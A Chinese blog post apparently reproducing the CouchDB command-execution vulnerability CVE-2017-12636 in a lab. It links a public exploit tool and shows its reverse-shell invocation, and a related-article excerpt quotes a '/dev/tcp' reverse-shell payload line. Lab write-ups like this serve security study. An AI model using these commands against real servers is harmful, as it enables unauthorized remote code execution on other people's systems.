Apache couchdb 命令执行 (CVE-2017-12636)复现

最新推荐文章于 2024-04-12 01:56:08 发布
最新推荐文章于 2024-04-12 01:56:08 发布
阅读量778 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/121140271
版权

couchdb 命令执行 (CVE-2017-12636)


所有文章,仅供安全研究与学习之用,后果自负!

couchdb 命令执行 (CVE-2017-12636)

Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。

0x01 漏洞描述

在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。

CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。

5984端口

0x02 影响范围

小于 1.7.0 以及 小于 2.1.1

0x03 漏洞复现

(1)访问靶场

在这里插入图片描述
version 为1.6

工具复现

https://github.com/RedTeamWing/CVE-2017-12636
python3 运行
(1)查看用法

python exp.py 1.6 118.193.36.37 25981

提示 python exp.py http://ip:port  version  反弹ip  反弹端口

在这里插入图片描述
(2) 反弹shell
在这里插入图片描述

![在这里插入图片描述](https://img-blog.csdnimg.cn/c685d444c6414feca4f25a73772401c9.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAd2hvYW1p44CC,size_20,color_FFFFFF,t_70,g_se,x_16)

0x04 漏洞修复

升级到CouchDB 1.7.1或 2.1.1。

LuckyCharm~
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Apache CouchDB信息泄露漏洞(CVE-2023-26268)通告
05-05
Apache CouchDB 信息泄露漏洞(CVE-2023-26268)通告 Apache CouchDB 是一个开源的 NoSQL 文档数据库,以基于 JSON 的文档格式收集和存储数据,提供了高可用性和高可靠性。近日,深信服安全团队监测到 Apache ...
apache-couchdb-2.3.1.msi
07-22
CouchDB 是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Object Notation (JSON) API 访问。术语 “Couch” 是 “Cluster Of Unreliable Commodity Hardware” 的首字母缩写,它反映了 CouchDB...
Couchdb_任意命令执行漏洞 CVE-2017-12636 漏洞复现
ADummy的博客
02-22 313
Couchdb 垂直权限绕过漏洞 by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>用户创建成功—>成功登录 0x01漏洞介绍 CouchDB 是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Object Notation (JSON) API 访问CouchDB会默认会在5984端口开放Restful的API接口,用于数据库的管理功能。 那么,问题出在哪呢?翻阅官方描述会发现,CouchDB中有一个Query_Server的配置
Vulhub漏洞系列:Couchdb漏洞(CVE-2017-12635、CVE-2017-12636
weixin_43072923的博客
05-24 1496
Vulhub漏洞系列:Couchdb漏洞(CVE-2017-12635、CVE-2017-12636)00.前言01.Couchdb简介02.漏洞描述03.漏洞复现 00.前言 这篇文章将对该漏洞进行简介并复现,同时简要说明Vulhub的使用方法,适合小白一起学习,大佬看看就好☺ 01.Couchdb简介 CouchDB是一个利用JSON文件来存贮数据,javascript作为MapReduce查询,以及常规HTTP作为API的且面向文档的开源数据库管理系统。 02.漏洞描述 0x01:CVE-2017
13 - vulhub - Couchdb 任意命令执行漏洞(CVE-2017-12636)(1)
最新发布
2401_83817171的博客
04-12 641
漏洞复现Couchdb 2.x和1.x的API接口有一定的区别,所以这个漏洞的利用方式也不同。本环境启动是1.6.0版本,如果你想测试2.1.0版本,可以启动CVE-2017- 12635附带的环境。靶机环境 139.196.87.102 (vulhub)攻击机环境 192.168.8.137 (虚拟机 Ubuntu 20、Java1.8、Burp)启动 Couchdb 垂直权限绕过漏洞 环境1.进入 vulhub 的 Couchdb 任意命令执行漏洞 路径cd /usr/local/tools/
CouchDB任意命令执行CVE-2017-12636
Kevin's Blog
07-26 971
文章目录一、漏洞原理二、触发条件三、漏洞场景 / 挖掘思路四、漏洞复现4.1 漏洞环境4.2 启动环境4.3 攻击过程五、防御措施 一、漏洞原理   CountDB通过RESTful JavaScript Object Notation (JSON) API访问CouchDB默认在5984开放Restful的API接口,用于数据库管理。由于CouchDB允许用户指定一个二进制程序或脚本,于Cou...
Couchdb 任意命令执行漏洞(CVE-2017-12636)
weixin_46239998的博客
01-01 764
command = rb"""sh -i >& /dev/tcp/192.168.217.128/5566 0>&1""" # 这里的ip为监听机ip也就是攻击机。target = 'http://192.168.217.128:5984' # 目标ip。如上图所示即反弹shell成功!三、构造payload。
couchdb 任意命令执行漏洞(cve-2017-12636
whatday的专栏
06-08 2281
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞,
couchdb-docker:Apache CouchDB Docker
02-03
couchdb-docker:Apache CouchDB Docker
couchdb-fauxton:Apache CouchDB
02-03
福顿Fauxton是CouchDB的新Web UI。 要使其在您的计算机上的开发中运行。... 分叉此仓库(有关详细信息,请参见) 克隆你的叉子: git clone https://github.com/YOUR-USERNAME/couchdb-fauxton.git
couchdb-utils:快速便携的 CouchDB 命令行实用程序
06-29
couchdb-utils 一个快速便携的 CouchDB 命令行实用程序。 有关更多信息,请参阅下面的帮助。 用 Go 构建。 具体来说,这是通过提供以下功能来维护备份数据库的: 轻松复制整个远程机器(以“_”开头的数据库除外)。 这可以重复运行,因为它会跳过目标上的任何现有复制器。 couchdb-utils rep host maindb.example.com:5984 --continuous 刷新/重新生成备份数据库中的所有视图以允许快速故障转移。 这可以从 cronjob 或作为外部进程运行。 有关更多信息,请参阅。 couchdb-utils refreshviews 速度是一个重要的特征。 这是您可以期待的一般概念。 $ time couchdb-utils databases | wc -l 26 real 0m0.020s user 0m0.000s
ccurl:CouchDB命令行工具允许缩短curl命令,而无需在命令行历史记录中输入用户名密码
05-28
ccurl-'couchdb curl' 如果使用CouchDB,则可以使用curl来访问所有内容。 麻烦在于,如果您使用的是经过身份验证的托管服务(例如Cloudant的服务),那么您的凭据将显示在命令行历史记录中,并且会有很多输入内容。 例如 curl ' https://mypassword:MyPAssw0rd@myhost.cloudant.com/database/12345678 ' 使用ccurl ,它将变为: ccurl /database/12345678 或添加带有curl的文档: curl -X POST -H ' Content-type:application/json ' -d ' {"a":1,"b":2} ' ' https://mypassword:MyPAssw0rd@myhost.cloudant.com/database '
Couchdb-权限绕过--命令执行--(CVE-2017-12635)&&(CVE-2017-12636)--H2database命令执行--(CVE-2022-23221)
weixin_74985952的博客
09-22 134
采用Vulfocus靶场环境进行复现,搭建操作和文章参考具体搭建教程参考vulfocus不能同步的解决方法/vulfocus同步失败。Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。
couchdb 任意命令执行漏洞 cve-2017-12636
whatday的专栏
01-30 314
Couchdb简介: Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 漏洞简介: CouchDB 是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Obj
利用Vulnhub复现漏洞 - Couchdb 任意命令执行漏洞(CVE-2017-12636
JiangBuLiu的博客
06-28 1006
Couchdb 任意命令执行漏洞(CVE-2017-12636)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现1.6.0 下的说明2.1.0 下的说明利用脚本 Vulnhub官方复现教程 https://vulhub.org/#/environments/couchdb/CVE-2017-12636/ 漏洞原理 Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱...
Couchdb 任意命令执行漏洞(CVE-2017-12636
时光凉春衫薄的博客
12-07 1915
产品样子 该漏洞是需要登录用户方可触发,如果不知道目标管理员密码,可以利用CVE-2017-12635先增加一个管理员用户。 首先通过(CVE-2017-12635)漏洞创建一个用户qwe 密码也是qwe 1.6.0 下的说明 依次执行如下请求即可触发任意命令执行: 查看命令执行的结果 按照 vulhub中提示的环境来看这些命令也可以通过curl命令进行 其中,`vulhub:vulhub`为管理员账号密码。 curl -X PUT 'ht...
source /etc/profile mkdir -p /home/ubuntu/gopath/src/github.com/hyperledger cd /home/ubuntu/gopath/src/github.com/hyperledger cp /resource/docker-compose /usr/local/bin chmod +x /usr/local/bin/docker-compose cp /resource/fabric-samples.tar.gz /home/ubuntu/gopath/src/github.com/hyperledger cd /home/ubuntu/gopath/src/github.com/hyperledger tar -xf ./fabric-samples.tar.gz source /etc/profile cd /home/ubuntu/gopath/src/github.com/hyperledger/fabric-samples/scripts ./bootstrap.sh 1.4.0 1.4.0 0.4.14 cd /home/ubuntu/gopath/src/github.com/hyperledger/fabric-samples/first-network ./byfn.sh up -s couchdb docker-compose -f docker-compose-cli.yaml -f docker-compose-couch.yaml -f docker-compose-kafka.yaml start ../bin/configtxgen -profile TwoOrgsChannel -outputCreateChannelTx channel-artifacts/test.tx -channelID test
06-07
这段命令的作用是: 1. 执行 `source /etc/profile` 命令,使得之前添加的 Go 语言环境变量生效; 2. 执行 `mkdir -p /home/ubuntu/gopath/src/github.com/hyperledger` 命令,创建一个目录用于存放 Hyperledger Fabric 的源代码; 3. 执行 `cd /home/ubuntu/gopath/src/github.com/hyperledger` 命令,切换到 Hyperledger Fabric 代码存放的目录; 4. 执行 `cp /resource/docker-compose /usr/local/bin` 命令,将预设好的 `docker-compose` 文件拷贝到 `/usr/local/bin` 目录下; 5. 执行 `chmod +x /usr/local/bin/docker-compose` 命令,添加可执行权限; 6. 执行 `cp /resource/fabric-samples.tar.gz /home/ubuntu/gopath/src/github.com/hyperledger` 命令,将预设好的 Hyperledger Fabric 样例程序压缩包拷贝到 `github.com/hyperledger` 目录下; 7. 执行 `cd /home/ubuntu/gopath/src/github.com/hyperledger` 命令,切换到 Hyperledger Fabric 样例程序所在的目录; 8. 执行 `tar -xf ./fabric-samples.tar.gz` 命令,解压 Hyperledger Fabric 样例程序压缩包; 9. 执行 `source /etc/profile` 命令,重新加载 Go 语言环境变量; 10. 执行 `cd /home/ubuntu/gopath/src/github.com/hyperledger/fabric-samples/scripts` 命令,切换到 Hyperledger Fabric 样例程序的脚本目录; 11. 执行 `./bootstrap.sh 1.4.0 1.4.0 0.4.14` 命令,安装 Hyperledger Fabric 所需的依赖组件; 12. 执行 `cd /home/ubuntu/gopath/src/github.com/hyperledger/fabric-samples/first-network` 命令,切换到 Hyperledger Fabric 样例程序的第一个网络目录; 13. 执行 `./byfn.sh up -s couchdb` 命令,启动第一个网络,并使用 CouchDB 作为状态数据库; 14. 执行 `docker-compose -f docker-compose-cli.yaml -f docker-compose-couch.yaml -f docker-compose-kafka.yaml start` 命令,启动 Fabric 网络中的 Docker 容器; 15. 执行 `../bin/configtxgen -profile TwoOrgsChannel -outputCreateChannelTx channel-artifacts/test.tx -channelID test` 命令,使用 configtxgen 工具生成通道交易配置文件和创世块配置文件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值